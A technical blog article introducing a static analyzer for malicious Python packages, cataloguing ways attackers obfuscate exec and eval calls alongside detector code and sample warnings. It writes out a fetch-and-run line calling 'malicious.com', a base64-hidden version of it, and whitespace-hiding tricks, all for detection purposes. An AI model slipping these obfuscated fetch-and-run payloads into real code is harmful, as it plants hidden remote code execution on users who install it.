Tracking malicious code execution in Python
Recently, I have been working on a new library that statically analyzes Python scripts and detects malicious or harmful code. It's called hexora.
Supply chain attacks have become increasingly common: more than 100 incidents were reported in the past five years for PyPI alone. Let's consider a scenario where a threat actor attempts to upload a malicious package to PyPI.
Malicious packages usually imitate a legitimate library so that the main code works as expected. The malicious part is typically inserted into one of the library's files and executed silently on import.
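For illustration, a trojanized __init__.py might look something like this (the package layout and payload are invented for this example):
# __init__.py of a hypothetical typosquatted package
from .core import *  # re-export the imitated library's real API so everything keeps working

# executed silently as a side effect of "import <package>"
exec("print('payload would run here')")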
An inexperienced actor will likely not obfuscate the code at all. Experienced actors usually obfuscate their code and try to evade simple heuristics such as regexes. Regexes are fragile and can be fooled with simple tricks, and it's impossible to know all of those tricks in advance.
One of the problems is that the harder you obfuscate the code, the more suspicious it looks and the easier it is to detect. So, actors try to strike a balance.
In this article, let's see how calls to eval or exec can be obfuscated and abused.
Basic usage
The naive way looks as follows:
exec("print(2 + 2)")
eval("2 + 2")
The problem is that many security and audit tools search for exec or eval and flag the code for human review. This kind of search is usually done using regexes.
Confusable homoglyphs
If we only need to bypass simple regexes, confusable homoglyphs can be used.
ℯ𝓍ℯ𝒸("print(2 + 2)")
This actually works in Python!
If proper AST parsing is used, it will be detected as a regular exec call, because Python normalizes identifiers to NFKC form at parse time. When regexes are used, the input must be normalized first.
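Both points can be demonstrated with the standard library: the CPython parser normalizes identifiers to NFKC (PEP 3131), and unicodedata applies the same normalization to raw text:
import ast
import unicodedata

source = 'ℯ𝓍ℯ𝒸("print(2 + 2)")'

# the parser normalizes identifiers, so the AST already contains a plain "exec" name
call = ast.parse(source).body[0].value
print(ast.dump(call.func))  # Name(id='exec', ctx=Load())

# a regex-based scanner must normalize the raw source itself first
print(unicodedata.normalize("NFKC", source))  # exec("print(2 + 2)")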
Using builtins module
Surprisingly, by simply using the builtins module, some detections can be bypassed:
import builtins
builtins.exec("print(2 + 2)")
Obfuscating usage of builtins module
By reassigning the builtins module to a new variable name (such as b), we can bypass simple detections:
import builtins
b = builtins
b.exec("2+2")
Even when a simple analyzer knows about the builtins module, it usually does not follow variable assignments.
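Following assignments is doable, though. Here is a minimal sketch of the idea (an illustration, not hexora's actual implementation) that tracks which names point at the builtins module:
import ast

SOURCE = """
import builtins
b = builtins
b.exec("2+2")
"""

aliases = {"builtins"}  # names currently known to refer to the builtins module
for node in ast.walk(ast.parse(SOURCE)):
    # record re-bindings such as "b = builtins"
    if isinstance(node, ast.Assign) and isinstance(node.value, ast.Name) and node.value.id in aliases:
        aliases.update(t.id for t in node.targets if isinstance(t, ast.Name))
    # flag exec/eval reached through any known alias
    elif isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
        obj = node.func.value
        if isinstance(obj, ast.Name) and obj.id in aliases and node.func.attr in ("exec", "eval"):
            print(f"suspicious: {obj.id}.{node.func.attr} on line {node.lineno}")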
Using __import__
The __import__ dunder function can be used to avoid importing the builtins module the regular way:
__import__("builtins").exec("2+2")
Constants obfuscation
Obfuscating constants makes simple detections even harder.
__import__("built" + "ins").exec("2+2")
We can also use the getattr function to reference the exec function by a string literal:
getattr(__import__("built"+"ins"),"ex"+"ec")("2+2")
# OR
__import__("built"+"ins").__getattribute__("ex"+"ec")("2+2")
The next option is to use sequence-manipulation tools such as reversed, join, and slicing with [::-1] to hide the exec string:
getattr(__import__("built"+"ins"),"".join(reversed(["ec","ex"])))("2+2")
My library can track all of these cases because it evaluates basic string operations. It only triggers when actual exec or eval calls are detected:
warning[HX3030]: Execution of an unwanted code via getattr(__import__(..), ..)
┌─ resources/test/test.py:1:1
│
1 │ getattr(__import__("built"+"ins"),"".join(reversed(["ec","ex"])))("2+2")
│ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX3030
│
= Confidence: VeryHigh
warning[HX3030]: Execution of an unwanted code via __import__
┌─ resources/test/test.py:6:1
│
5 │
6 │ __import__("snitliub"[::-1]).eval("print(123)")
│ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX3030
│
= Confidence: VeryHigh
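Folding such constant expressions is conceptually simple. Here is a rough sketch of the idea using the ast module (an illustration, not hexora's actual code):
import ast

def fold(node):
    # plain string literal
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    # concatenation: "built" + "ins"
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        left, right = fold(node.left), fold(node.right)
        if isinstance(left, str) and isinstance(right, str):
            return left + right
    # "".join(reversed(["ec", "ex"]))
    if (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
            and node.func.attr == "join" and len(node.args) == 1):
        sep, arg = fold(node.func.value), node.args[0]
        if (isinstance(sep, str) and isinstance(arg, ast.Call)
                and isinstance(arg.func, ast.Name) and arg.func.id == "reversed"
                and len(arg.args) == 1 and isinstance(arg.args[0], ast.List)):
            items = [fold(e) for e in arg.args[0].elts]
            if all(isinstance(i, str) for i in items):
                return sep.join(reversed(items))
    return None

expr = ast.parse('"".join(reversed(["ec", "ex"]))', mode="eval").body
print(fold(expr))  # exec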
Importlib
Using __import__ is not the only way to import a module. You can also use importlib:
import importlib
importlib.import_module("builtins").exec("2+2")
Both __import__ and importlib are often tracked, since they are relatively rare in legitimate code.
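They are also straightforward to spot in an AST; a rough sketch:
import ast

SOURCE = """
__import__("builtins").exec("2+2")
importlib.import_module("builtins").exec("2+2")
"""

for node in ast.walk(ast.parse(SOURCE)):
    if not isinstance(node, ast.Call):
        continue
    f = node.func
    # bare __import__(...) calls
    if isinstance(f, ast.Name) and f.id == "__import__":
        print(f"dynamic import on line {node.lineno}")
    # importlib.import_module(...) calls
    elif (isinstance(f, ast.Attribute) and f.attr == "import_module"
          and isinstance(f.value, ast.Name) and f.value.id == "importlib"):
        print(f"dynamic import on line {node.lineno}")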
Using sys.modules, globals(), locals() or vars()
Import mechanisms can be avoided altogether by going through sys.modules, globals(), locals(), or vars():
import builtins
import sys

sys.modules["builtins"].exec("2+2")
globals()["__builtins__"].exec("2+2")  # at script top level, __builtins__ is the builtins module
locals()["builtins"].exec("2+2")       # works because "import builtins" bound the name above
# Hide everything
getattr(globals()["__bu"+"ilt"+"ins__"],"".join(reversed(["al","ev"])))("2+2")
Using compile
Calls to exec and eval can be avoided by using compile:
import types

types.FunctionType(compile("print(2+2)", "<string>", "exec"), globals())()
This can also be obfuscated further, or detected using similar techniques as before. It only avoids direct calls to exec and eval.
What's usually passed to exec or eval?
Usually, the code passed to exec or eval is obfuscated as well.
This can be achieved by using various encodings and compression algorithms, such as base64, hex, rot13, marshal, zlib, and so on.
Often, the payload aims to be as minimal as possible so it is harder to spot within the code, especially when the call is pushed far to the right with excessive whitespace so that editors do not display it when line wrapping is disabled. The only way to notice it is to scroll horizontally.
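A trimmed-down reconstruction of that trick (real samples push the payload hundreds of columns further to the right):
# the visible part of the line looks harmless; the payload hides far off-screen
import os                                                                                ;exec("print('hidden')")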
For example, it can download an external script and execute it:
import urllib.request;eval(urllib.request.urlopen("http://malicious.com/payload.py").read().decode("utf-8"))
The final code injection can look as follows:
import base64

getattr(globals()["__bu" + "ilt" + "ins__"], "".join(reversed(["ec", "ex"])))(
    base64.b64decode(
        "aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2V2YWwodXJsbGliLnJlcXVlc3QudXJsb3BlbigiaHR0cDovL21hbGljaW91cy5jb20vcGF5bG9hZC5weSIpLnJlYWQoKSk="
    )
)
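Decoding the string (instead of running it) reveals the same downloader as above:
import base64

payload = "aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2V2YWwodXJsbGliLnJlcXVlc3QudXJsb3BlbigiaHR0cDovL21hbGljaW91cy5jb20vcGF5bG9hZC5weSIpLnJlYWQoKSk="
print(base64.b64decode(payload).decode())
# import urllib.request;eval(urllib.request.urlopen("http://malicious.com/payload.py").read())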
When eval/exec calls are chained with base64 decoding, it's another signal that something fishy is going on. You typically won't see this kind of call in legitimate code.
Also, since base64 strings usually have a length that is a multiple of 4 and consist of a specific set of characters, they can be detected too.
warning[HX6000]: Base64 encoded string found, potentially obfuscated code.
┌─ resources/test/test.py:3:9
│
2 │ base64.b64decode(
3 │ "aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2V2YWwodXJsbGliLnJlcXVlc3QudXJsb3BlbigiaHR0cDovL21hbGljaW91cy5jb20vcGF5bG9hZC5weSIpLnJlYWQoKSk="
│ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX6000
4 │ )
│
= Confidence: Medium
Help: Base64-encoded strings can be used to obfuscate code or data.
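A naive version of such a check could look like this (a sketch, not hexora's actual rule; long identifiers and hex blobs can also match, which is why such heuristics warrant only medium confidence):
import re

# at least 24 characters from the base64 alphabet, grouped in fours,
# with optional "=" padding so the total length stays a multiple of 4
BASE64_RE = re.compile(r"^(?:[A-Za-z0-9+/]{4}){6,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$")

def looks_like_base64(s: str) -> bool:
    return bool(BASE64_RE.match(s))

print(looks_like_base64("aW1wb3J0IHVybGxpYi5yZXF1ZXN0"))  # True
print(looks_like_base64("hello world"))                   # False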
Conclusion
These are basic techniques, yet threat actors still abuse them in packages uploaded to PyPI.
As you can see, tracking this kind of behavior in a language as dynamic as Python is hard! Even with static analysis, you need to track a lot of things to be effective.
Static analysis can be replaced with dynamic analysis (code sandboxing), but such an approach has its own drawbacks.
LLMs are pretty good at detecting malicious code as well, but they tend to produce false positives and false negatives. They also have significant costs when scanning tens of thousands of files.
Some companies and research projects train their own machine learning models. Compared to LLMs, these cost far less to run, but they also require human intervention due to the same accuracy problems.
The best way to approach this problem is to combine all of these techniques and use a human in the loop for the final decision.